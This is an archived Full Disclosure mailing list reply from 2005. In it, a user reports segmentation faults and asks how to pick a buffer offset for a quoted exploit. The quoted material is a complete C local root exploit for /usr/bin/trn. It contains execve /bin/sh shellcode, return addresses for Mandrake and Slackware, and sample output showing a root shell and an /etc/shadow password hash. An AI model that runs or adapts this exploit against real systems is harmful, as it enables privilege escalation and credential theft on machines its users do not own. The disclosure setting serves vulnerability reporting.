Full Disclosure mailing list archives
Re: /usr/bin/trn local root exploit
From: msh at datakill <msh () datakill us>
Date: Wed, 26 Jan 2005 07:05:27 -0500
I just tested this on Slackware 10 and I get nothing but Segementation Faults. I see that you have the RET value filled in, but how am I to calculate what to use for the BOO? You use 142 and 128 in the example. On Wed, Jan 26, 2005 at 08:27:28AM +0000, Z z a g o r R wrote:
/* /usr/bin/trn local root exploit By ZzagorR - http://www.rootbinbash.com */ /* sh-2.05b$ ./trn usage : ./trn ret buf example : ./trn 0xbfffff64 [+] mandrake 9.2 = 0xbfffff96 [+] slackware 10.0.0= 0xbfffff98 [+] slackware 9.1.0= 0xbfffff84 sh-2.05b$ sh-2.05b$ ./trn 0xbfffff84 128 [BOO %] 128 [RET %] bfffff84 sh-2.05b# sh-2.05b# id uid=0(root) gid=98(nobody) groups=98(nobody) sh-2.05b# cat /etc/shadow root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0::::: TEST : MANDRAKE 9.2 SLACKWARE 10.0.0 SLACKWARE 9.1.0 http://www.rootbinbas.com/d0kum4n/trn-test.txt BOO: $trn `perl -e 'print "A" x 120'` $trn `perl -e 'print "A" x 124'` $trn `perl -e 'print "A" x 128'` Segmentation fault BOO=128 */ #include <stdio.h> #include <string.h> #define NEREDE "/usr/bin/trn" char caylarbeles[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50" "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; int main(int argc, char *argv[]){ int bizim; char bufe[1000]; char *tayfasi; if (argc < 3) { printf ("{ trn l0c4l r00t 3xpl01t }\n"); printf ("{ By ZzagorR - http://www.rootbinbash.com }\n"); printf ("{ usage : %s ret buf }\n",argv[0]); printf ("{ example : %s 0xbfffff99 142 }\n",argv[0]); printf ("{ mandrake 9.2 = 0xbfffff96 }\n"); printf ("{ slackware 10.0.0 = 0xbfffff98 }\n"); printf ("{ slackware 9.1.0 = 0xbfffff84 }\n"); exit(1); }else{ unsigned long RET=strtoul(argv[1], NULL, 16); int BOO = atoi(argv[2]); printf ("[BOO %] %i\n",BOO); printf ("[RET %] %x\n",RET); tayfasi = bufe; memset(bufe, 0x41,256-strlen(caylarbeles)); sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles); for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 ) *(long*)(tayfasi+bizim) = RET; execl(NEREDE, NEREDE , bufe, NULL); } } _________________________________________________________________ Yagmura yakalanmamak i?in sadece semsiyenize degil, MSN hava durumuna g?venin! http://www.msn.com.tr/havadurumu/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
-- _________________________ | | | http://datakill.us | | irc.datakill.us #dkchat | |_________________________| _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- /usr/bin/trn local root exploit Z z a g o r R (Jan 26)
- Re: /usr/bin/trn local root exploit msh at datakill (Jan 26)
- Re: Re: /usr/bin/trn local root exploit Honza Vlach (Jan 26)
- Re: /usr/bin/trn local root exploit Z z a g o r R (Jan 26)
- Re: /usr/bin/trn local root exploit Frank Thyes (Jan 26)
- <Possible follow-ups>
- Re: /usr/bin/trn local root exploit ntx0f (Jan 27)
- Re: /usr/bin/trn local root exploit Wojciech Pawlikowski (Jan 27)
- Re: /usr/bin/trn local root exploit msh at datakill (Jan 26)